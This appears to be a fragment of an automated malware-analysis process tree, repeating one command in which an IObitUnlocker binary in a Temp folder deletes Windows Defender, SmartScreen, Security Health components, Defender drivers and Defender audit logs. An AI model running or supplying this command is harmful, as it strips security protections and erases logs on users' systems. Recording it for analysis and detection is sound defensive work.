C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"10⤵
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"10⤵
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"10⤵
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"10⤵
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"10⤵
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"10⤵
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"10⤵
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"10⤵
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"10⤵
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"10⤵
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"10⤵
-
-
